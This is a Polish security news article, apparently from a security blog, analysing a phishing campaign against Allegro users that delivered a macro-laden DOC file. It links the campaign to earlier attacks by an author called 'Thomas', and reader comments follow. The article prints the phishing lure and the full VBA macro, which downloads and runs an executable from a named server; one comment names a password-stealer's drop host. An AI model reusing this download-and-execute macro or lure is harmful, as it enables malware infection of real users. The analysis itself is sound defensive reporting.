Wśród licznych internetowych ataków, których ofiarami padają Polacy, od czasu do czasu widać takie, których sprawcami są nasi rodacy. Analiza kilku z nich pozwala stwierdzić, że ich autorem może być jedna i ta sama osoba, ukrywająca się pod pseudonimem Thomas.
Dwa dni temu wielu użytkowników Allegro otrzymało całkiem dobrze przygotowaną wiadomość, której celem było nakłonienie ich do zainstalowania na swoich komputerach złośliwego oprogramowania. Pewne cechy tego ataku wskazują, że sprawca może mieć coś wspólnego z licznymi wcześniejszymi próbami infekowania Polaków.
Atak na użytkowników Allegro
Od środowego popołudnia (czyli tuż przed długim weekendem) osoby posiadające konta na Allegro zaczęły otrzymywać wiadomości o tytule „Blokada Twojego konta Allegro”. Atak, z pozoru przypominający banalny phishing, z phishingiem nie miał nic wspólnego i raczej nie był banalny.
Treść wiadomości wyglądała tak:
Twoje konto allegro zostanie wkrótce zablokowane z powodu umieszczania w opisie Twojej aukcji „[tutaj nazwa prawdziwej aukcji użytkownika]”
tresci niezgodnych z regulaminem Allegro.
Szczególy na temat bledów w aukcji oraz blokady Twojego konta znajdziesz w dokumencie tekstowym Allegro-05-2014-52556.doc
Przeslanym w zalaczniku wiadomosci.
Z Powazaniem Mariusz Lichowicz
Dzial Intendentury i Monitoringu Allegro
W treści wiadomości zamieszczono nazwę faktycznie wystawionej przez danego użytkownika aukcji, a w załączniku znajdował się plik z rozszerzeniem .DOC.
Czy my skądś znamy tę metodę infekcji?
W pliku DOC nie wykorzystano żadnego błędu typu 0day, a zwykły atak socjotechniczny wsparty odrobiną technologii. Jego otwarcie powoduje wyświetlenie takiego oto „dokumentu”.
Widoczny na ekranie ślad po nie załadowanym pliku graficznym jest tak naprawdę grafiką o takim właśnie wyglądzie, mającą zachęcić użytkownika do aktywowania obsługi makr. W dalszej analizie przychodzi nam z pomocą niezawodny OfficeMalScanner. Pozwala on zapoznać się z treścią załączonego do pliku .DOC makro bez potrzeby jego uruchamiania. Jego najistotniejszy fragment to:
Sub Workbook_Open() Auto_Open End Sub Sub MIGYYT() MXKAJR "http://serwer1400183.home.pl/MSUPDATE64.exe", Environ("TMP") & "\INPZIX.exe" End Sub Function MXKAJR(ByVal JBLVDE As String, ByVal ZLKHGM As String) As Boolean Dim NMJVEL As Object, PIRGNC As Long, CWCFQJ As Long, JAVFVS() As Byte Set NMJVEL = CreateObject("MSXML2.XMLHTTP") NMJVEL.Open "GET", JBLVDE, False NMJVEL.Send "send request" Do While NMJVEL.readyState <> 4 DoEvents Loop JAVFVS = NMJVEL.responseBody CWCFQJ = FreeFile If Dir(ZLKHGM) <> "" Then Kill ZLKHGM Open ZLKHGM For Binary As #CWCFQJ Put #CWCFQJ, , JAVFVS Close #CWCFQJ Dim WQFBZN WQFBZN = Shell(ZLKHGM, 1)
Regularni czytelnicy naszego serwisu bez trudu zauważą, że kod ten jest praktycznie identyczny z tym, który opisywaliśmy półtora miesiąca temu w analizie ataku na naszych czytelników. Zgadza się praktycznie każda linijka oprócz losowych nazw zmiennych i linku do pliku wykonywalnego, który makro pobiera i uruchamia. Identycznie, jak w poprzednim przypadku, plik DOC stworzony został przez użytkownika Thomas. Co ciekawe, podobny rodzaj ataku występuje relatywnie rzadko, a jeden z udokumentowanych przypadków pochodzi z kwietnia tego roku i dotyczył użytkowników w Holandii.
Krótka analiza pliku wykonywalnego
Plik, który – mimo iż minęły już ponad 2 dni – ciągle znajduje się na serwerach home.pl, również wygląda nam znajomo. Jego analiza wskazuje, że jest wynikiem kompilacji skryptów AutoIt, tak samo jak w ataku na czytelników z3s oraz… w ataku na pracowników polskich samorządów z marca tego roku. Co ciekawe, wg analizy serwisu malwr.com, plik ten pobiera inne złośliwe oprogramowanie z innego serwera, a także zgłasza się do swojego C&C, który również jest serwerem w infrastrukturze home.pl (i także nadal działa). Łączy się także z serwerem w infrastrukturze cba.pl, ta strona została już jednak wyłączona.
Atak identyczny jak w przypadku KRD
Praktycznie taki sam atak, jak na użytkowników Allegro, 3 tygodnie temu wykorzystywał tożsamość Krajowego Rejestru Długów. Jedyna różnica – oprócz treści wiadomości – polegała na tym, że „raport” z KRD nie był dołączony do wiadomości, a w treści był link do jego pobrania z adresu www.krd-raport.pl.tf.
Wiadomość w pliku DOC wyglądała znajomo.
Złośliwe pliki pobierane były z serwera s1.
To nie koniec analogii
Jak już wspominaliśmy, dokumenty .DOC są bardzo podobne i oba zostały utworzone przez użytkownika Thomas. Co ciekawe, taką samą nazwę użytkownika wskazuje CERT Polska, opisując swoje ustalenia dotyczące autora oprogramowania VBKlip w wersji .NET, którego metodą ataku było podmienianie numeru rachunku bankowego w momencie kopiowania do schowka. Ze sposobem działania tamtego przestępcy zgadza się także podmienianie ikon w plikach wykonywalnych – ten pobierany w ataku na użytkowników Allegro ma również zmienioną ikonę.
Jakby tego było mało, to w treści wiadomości przestępcy pojawił się inny charakterystyczny ciąg, mianowicie „Dzial Intendentury i Monitoringu”, który pierwszy raz trafił do szerszej publiki jeszcze w październiku 2012 roku i kojarzony był z analogicznymi atakami prowadzonymi przez niejakiego Armaged0na, w tym np. phishingu na klientów iPKO.
Czy Armaged0n i Thomas to jedna i ta sama osoba? Czy stoi za wszystkimi opisanymi powyżej atakami, czy też nowi atakujący sprytnie nawiązują do sposobu działania swoich poprzedników, by pomieszać szyki osobom śledzącym ich zachowanie? Naszym zdaniem co najmniej część z opisanych powyżej kampanii ma jednego autora – i zapewne nie raz jeszcze o nim coś napiszemy. Jeśli czyta nasz artykuł i natrafił na jakieś nieścisłości – zapraszamy do kontaktu.
Za kopię wiadomości z ataku na użytkowników Allegro dziękujemy Maćkowi.
Komentarze
Ciekawe kiedy odpowiednie osoby się nim zajmą ;-)
Obstawiam ze to Zdzislaw Dyrma ktorego blog niedawno zniknął z sieci :)
Tez tak w pierwszej chwili pomyślałem ale dyrma to „programista” php co najwyżej.
Niestety, Zdzisiu już od kilku dni jest unieszkodliwiony. :)
A wiecie kto przejal strone zdziska i kto sie z nim utozsamia…. JK Mikke
Pliki .doc są niewinne. To najwyraźniej program służący do odczytu tych plików jest wirusem, bo pozwala na wykonywanie plików pobranych z internetu bez najmniejszego ostrzeżenia!
Makra są domyślnie wyłączone i ich włączenie powoduje wyświetlenie ostrzeżenia. Masz jakieś problemy natury religijnej z MS? ;)
Wyświetla bardzo wyraźne ostrzeżenie i pińcet razy pyta się użytkownika czy wie, co robi. Ale przecież w treści pliku jest napisane, żeby włączyć obsługę makr, więc jak trzeba to trzeba…
Publicznie dostępne raty szyfrowane razorcryptem spreadowane via publicznie dostępne makra rce offica to może być ten armagedon.
Jak widać tyle czasu minęło od poprzednich ataków a on jak był lamerem tak jest nadal…
18 czerwca była jeszcze „kampania” rachunków za hotel („Przypominamy o zaleglej Platnosci za Hotel”) rzekomo z [email protected] ([email protected] z acc153.rev.netart.pl) – plik na tym samym serwerze home.pl („gratulacje” dla śniętych adminów home.pl – po raz kolejny brak jakiejkolwiek reakcji na zgłoszenia), ten sam plik i oczywiście ta sama metoda.
Zwróciłbym również uwagę na niedawną „kampanię” faktur z Niemiec – o ile pamiętam któryś z maili/załączników chyba również odwoływał się do polskich serwerów?
Jak słysze teksty to pewnie dyrma to smiać mi się chce nie znacie kolesie gadacie głupoty, czy wy sadzicie ze dyrma to jedyny pr0 w polskich internetach bo jak tak to widocznie macie 13 lat lub w glowie kopa bzdur. Ludzie ogarnicie zwoje bo się pala szybciej niż wam się to wydaje.
Podeślecie próbkę MSUPDATE64.exe?
P.S. Ten plik który jest pobierany z hostingu directxex (ISR400.exe) to zwykły stealer który przesyła zapisane hasła na zeus-bot.cba.pl